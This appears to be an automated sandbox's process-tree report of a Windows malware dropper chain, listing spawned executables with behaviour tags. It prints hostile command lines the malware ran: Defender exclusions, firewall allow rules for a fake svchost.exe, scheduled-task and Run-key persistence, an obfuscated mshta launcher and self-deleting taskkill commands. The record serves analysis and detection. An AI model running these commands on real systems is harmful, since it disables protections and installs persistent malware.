C:\Users\Admin\AppData\Local\Temp\is-70MBQ.tmp\Sat169c60f22b8.tmp"C:\Users\Admin\AppData\Local\Temp\is-70MBQ.tmp\Sat169c60f22b8.tmp" /SL5="$30168,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat169c60f22b8.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-EUKE1.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-EUKE1.tmp\postback.exe" ss19⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1600f41eca.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS88821CC3\Sat1600f41eca.exeSat1600f41eca.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\AhWVemGiKw7SpgUWHHpZkjyt.exe"C:\Users\Admin\Pictures\Adobe Films\AhWVemGiKw7SpgUWHHpZkjyt.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\WBGMEjP2ZOPhKrFm3D2PsxK2.exe"C:\Users\Admin\Pictures\Adobe Films\WBGMEjP2ZOPhKrFm3D2PsxK2.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 2887⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\8sTAAiYk2sEOrXXjfesKoFdn.exe"C:\Users\Admin\Pictures\Adobe Films\8sTAAiYk2sEOrXXjfesKoFdn.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\8sTAAiYk2sEOrXXjfesKoFdn.exe"C:\Users\Admin\Pictures\Adobe Films\8sTAAiYk2sEOrXXjfesKoFdn.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\bdsbfds.exe"C:\Users\Admin\AppData\Local\Temp\bdsbfds.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\clip.exe"C:\Users\Admin\AppData\Local\Temp\clip.exe"8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\Pictures\Adobe Films\OLyCAAaDhlJD4xz9ygf7NwsA.exe"C:\Users\Admin\Pictures\Adobe Films\OLyCAAaDhlJD4xz9ygf7NwsA.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Pictures\Adobe Films\J9zM_BwL31SvyQCz441NjFE2.exe"C:\Users\Admin\Pictures\Adobe Films\J9zM_BwL31SvyQCz441NjFE2.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\inst2.exe"C:\Program Files (x86)\Company\NewProduct\inst2.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\Pictures\Adobe Films\5X4Z1tG8vqSmImDuhk43ndKc.exe"C:\Users\Admin\Pictures\Adobe Films\5X4Z1tG8vqSmImDuhk43ndKc.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1100 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\fBp6HqC0_TNfSR_tIpttHvQC.exe"C:\Users\Admin\Pictures\Adobe Films\fBp6HqC0_TNfSR_tIpttHvQC.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\fBp6HqC0_TNfSR_tIpttHvQC.exe"C:\Users\Admin\Pictures\Adobe Films\fBp6HqC0_TNfSR_tIpttHvQC.exe"7⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\7PEDuinOLwXYX_6iGkQn8Cc8.exe"C:\Users\Admin\Pictures\Adobe Films\7PEDuinOLwXYX_6iGkQn8Cc8.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\9Thnn_NJVuhARrG07i9nwHb1.exe"C:\Users\Admin\Documents\9Thnn_NJVuhARrG07i9nwHb1.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\bFnTrTAo0k_bDjinTCLMwvzb.exe"C:\Users\Admin\Pictures\Adobe Films\bFnTrTAo0k_bDjinTCLMwvzb.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\41QX82bYGlA3Bkj6dsFQtiUV.exe"C:\Users\Admin\Pictures\Adobe Films\41QX82bYGlA3Bkj6dsFQtiUV.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 720 -s 2769⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\vg9O1s8jU7nNIaD25edzyuif.exe"C:\Users\Admin\Pictures\Adobe Films\vg9O1s8jU7nNIaD25edzyuif.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2192 -s 3009⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\YhgrWEcmKvKICpB75ltxZDUA.exe"C:\Users\Admin\Pictures\Adobe Films\YhgrWEcmKvKICpB75ltxZDUA.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\s9hCztd94a_wFOSLvsJOv4Qf.exe"C:\Users\Admin\Pictures\Adobe Films\s9hCztd94a_wFOSLvsJOv4Qf.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\s9hCztd94a_wFOSLvsJOv4Qf.exe"C:\Users\Admin\Pictures\Adobe Films\s9hCztd94a_wFOSLvsJOv4Qf.exe" -u9⤵
-
C:\Users\Admin\Pictures\Adobe Films\OblbIZVPY7a0tO5Oh7yjmZQL.exe"C:\Users\Admin\Pictures\Adobe Films\OblbIZVPY7a0tO5Oh7yjmZQL.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"10⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7ffcbb22dec0,0x7ffcbb22ded0,0x7ffcbb22dee011⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff7cb799e70,0x7ff7cb799e80,0x7ff7cb799e9012⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1688,9753090863115678352,9333774829379292461,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15744_1443807735" --mojo-platform-channel-handle=1704 /prefetch:811⤵
-
C:\Users\Admin\Pictures\Adobe Films\mt1GBIsJD_LSfQtJhR6C12ul.exe"C:\Users\Admin\Pictures\Adobe Films\mt1GBIsJD_LSfQtJhR6C12ul.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FA802.tmp\mt1GBIsJD_LSfQtJhR6C12ul.tmp"C:\Users\Admin\AppData\Local\Temp\is-FA802.tmp\mt1GBIsJD_LSfQtJhR6C12ul.tmp" /SL5="$80430,506127,422400,C:\Users\Admin\Pictures\Adobe Films\mt1GBIsJD_LSfQtJhR6C12ul.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-RTJJI.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-RTJJI.tmp\lakazet.exe" /S /UID=270910⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\4c-e4ab5-ed4-ea9b0-8f9f899edcd19\Gyjegahogu.exe"C:\Users\Admin\AppData\Local\Temp\4c-e4ab5-ed4-ea9b0-8f9f899edcd19\Gyjegahogu.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1wujvlqo.p0q\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\1wujvlqo.p0q\installer.exeC:\Users\Admin\AppData\Local\Temp\1wujvlqo.p0q\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uooypvji.ysl\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\uooypvji.ysl\any.exeC:\Users\Admin\AppData\Local\Temp\uooypvji.ysl\any.exe13⤵
-
C:\Users\Admin\AppData\Local\Temp\uooypvji.ysl\any.exe"C:\Users\Admin\AppData\Local\Temp\uooypvji.ysl\any.exe" -u14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yiug0m2q.0jx\autosubplayer.exe /S & exit12⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\uNllGlcbm2GVjpyTbg93jDn7.exe"C:\Users\Admin\Pictures\Adobe Films\uNllGlcbm2GVjpyTbg93jDn7.exe"6⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \7⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
- Executes dropped EXE
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \8⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes8⤵
-
C:\Users\Admin\Pictures\Adobe Films\PQBJTAaQtTewucBijOxkjY_l.exe"C:\Users\Admin\Pictures\Adobe Films\PQBJTAaQtTewucBijOxkjY_l.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\B9fyo7QqeK801elsQ3zzApZx.exe"C:\Users\Admin\Pictures\Adobe Films\B9fyo7QqeK801elsQ3zzApZx.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\7o86wFKJyInJIOUE8xaT8jW5.exe"C:\Users\Admin\Pictures\Adobe Films\7o86wFKJyInJIOUE8xaT8jW5.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 2727⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\rGwY69WmOM_qqsBGjBQCwu70.exe"C:\Users\Admin\Pictures\Adobe Films\rGwY69WmOM_qqsBGjBQCwu70.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2616 -s 2407⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\I43HlxEfzYdBanh5sTg7Y_zX.exe"C:\Users\Admin\Pictures\Adobe Films\I43HlxEfzYdBanh5sTg7Y_zX.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3532 -s 2727⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\UiCHUYf2DCZO0cVtFmpt1M5s.exe"C:\Users\Admin\Pictures\Adobe Films\UiCHUYf2DCZO0cVtFmpt1M5s.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3560 -s 2047⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\9osAN_jHjbdtS1wgTHVWBnwP.exe"C:\Users\Admin\Pictures\Adobe Films\9osAN_jHjbdtS1wgTHVWBnwP.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\4999053.exe"C:\Users\Admin\AppData\Roaming\4999053.exe"7⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global8⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 4489⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\4421256.exe"C:\Users\Admin\AppData\Roaming\4421256.exe"7⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\8069537.exe"C:\Users\Admin\AppData\Roaming\8069537.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5011017.exe"C:\Users\Admin\AppData\Roaming\5011017.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\2325315.exe"C:\Users\Admin\AppData\Roaming\2325315.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\3364777.exe"C:\Users\Admin\AppData\Roaming\3364777.exe"7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscrIPT: CLose ( cREaTeobJEcT ( "WscRipT.SHelL" ). rUN ( "CMD.exe /Q /R cOPy /Y ""C:\Users\Admin\AppData\Roaming\3364777.exe"" ..\UpJnOk3Yn_BZ21.EXe &&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF """"== """" for %m IN ( ""C:\Users\Admin\AppData\Roaming\3364777.exe"" ) do taskkill /F /IM ""%~nXm"" " , 0 , TRue ) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /R cOPy /Y "C:\Users\Admin\AppData\Roaming\3364777.exe" ..\UpJnOk3Yn_BZ21.EXe &&STARt ..\UPJnOK3YN_bz21.EXE /p046ZeOV5fN93E5 & iF ""== "" for %m IN ( "C:\Users\Admin\AppData\Roaming\3364777.exe" ) do taskkill /F /IM "%~nXm"9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM "3364777.exe"10⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Roaming\5061526.exe"C:\Users\Admin\AppData\Roaming\5061526.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\Xf_zx9O1XjyURUhCmLjojbZL.exe"C:\Users\Admin\Pictures\Adobe Films\Xf_zx9O1XjyURUhCmLjojbZL.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 5607⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\UeuBMbC_JvHWFwRUeq1Z4yhO.exe"C:\Users\Admin\Pictures\Adobe Films\UeuBMbC_JvHWFwRUeq1Z4yhO.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\vrDet9OfjstR25razE2Nylyc.exe"C:\Users\Admin\Pictures\Adobe Films\vrDet9OfjstR25razE2Nylyc.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\SPbqmysrbDmwN9BKwv6anVMQ.exe"C:\Users\Admin\Pictures\Adobe Films\SPbqmysrbDmwN9BKwv6anVMQ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\SPbqmysrbDmwN9BKwv6anVMQ.exe"C:\Users\Admin\Pictures\Adobe Films\SPbqmysrbDmwN9BKwv6anVMQ.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\ey4uvXWEOUalkU_eykdaluyu.exe"C:\Users\Admin\Pictures\Adobe Films\ey4uvXWEOUalkU_eykdaluyu.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6564 -s 16807⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\kwpQoqQ0RdrnOPfE49tQ0tRM.exe"C:\Users\Admin\Pictures\Adobe Films\kwpQoqQ0RdrnOPfE49tQ0tRM.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DRRE8.tmp\kwpQoqQ0RdrnOPfE49tQ0tRM.tmp"C:\Users\Admin\AppData\Local\Temp\is-DRRE8.tmp\kwpQoqQ0RdrnOPfE49tQ0tRM.tmp" /SL5="$10334,506127,422400,C:\Users\Admin\Pictures\Adobe Films\kwpQoqQ0RdrnOPfE49tQ0tRM.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-ERGV2.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-ERGV2.tmp\lakazet.exe" /S /UID=27098⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\e2-aa5ba-d6f-032b4-3e82b65a16446\Sylaezhaetelo.exe"C:\Users\Admin\AppData\Local\Temp\e2-aa5ba-d6f-032b4-3e82b65a16446\Sylaezhaetelo.exe"9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e610⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcc8a346f8,0x7ffcc8a34708,0x7ffcc8a3471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad10⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcc8a346f8,0x7ffcc8a34708,0x7ffcc8a3471811⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe0,0x104,0x108,0xa0,0x10c,0x7ffcc8a346f8,0x7ffcc8a34708,0x7ffcc8a3471811⤵
-
C:\Users\Admin\AppData\Local\Temp\b4-639c8-9a8-b77be-987e4d6fd2ba1\Pogodybaely.exe"C:\Users\Admin\AppData\Local\Temp\b4-639c8-9a8-b77be-987e4d6fd2ba1\Pogodybaely.exe"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hs0lmzl3.0tl\installer.exe /qn CAMPAIGN="654" & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\hs0lmzl3.0tl\installer.exeC:\Users\Admin\AppData\Local\Temp\hs0lmzl3.0tl\installer.exe /qn CAMPAIGN="654"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5b14ueck.yuw\any.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\5b14ueck.yuw\any.exeC:\Users\Admin\AppData\Local\Temp\5b14ueck.yuw\any.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\5b14ueck.yuw\any.exe"C:\Users\Admin\AppData\Local\Temp\5b14ueck.yuw\any.exe" -u12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ewqf5iy2.ntm\gcleaner.exe /mixfive & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\ewqf5iy2.ntm\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ewqf5iy2.ntm\gcleaner.exe /mixfive11⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ewqf5iy2.ntm\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ewqf5iy2.ntm\gcleaner.exe /mixfive12⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ewqf5iy2.ntm\gcleaner.exe" & exit13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f14⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aoz0k4r3.zc2\autosubplayer.exe /S & exit10⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rbjuj1q2.1o3\installer.exe /qn CAMPAIGN=654 & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\rbjuj1q2.1o3\installer.exeC:\Users\Admin\AppData\Local\Temp\rbjuj1q2.1o3\installer.exe /qn CAMPAIGN=65411⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\rbjuj1q2.1o3\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\rbjuj1q2.1o3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1636565878 /qn CAMPAIGN=654 " CAMPAIGN="654"12⤵
- Enumerates connected drives
-
C:\Program Files\MSBuild\JMQTECCOCB\foldershare.exe"C:\Program Files\MSBuild\JMQTECCOCB\foldershare.exe" /VERYSILENT9⤵
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Users\Admin\Pictures\Adobe Films\Sg5zNg8pvLcFbf509SrSiImk.exe"C:\Users\Admin\Pictures\Adobe Films\Sg5zNg8pvLcFbf509SrSiImk.exe"6⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=17⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--cSExK3QD"8⤵
- Suspicious use of FindShellTrayWindow
-
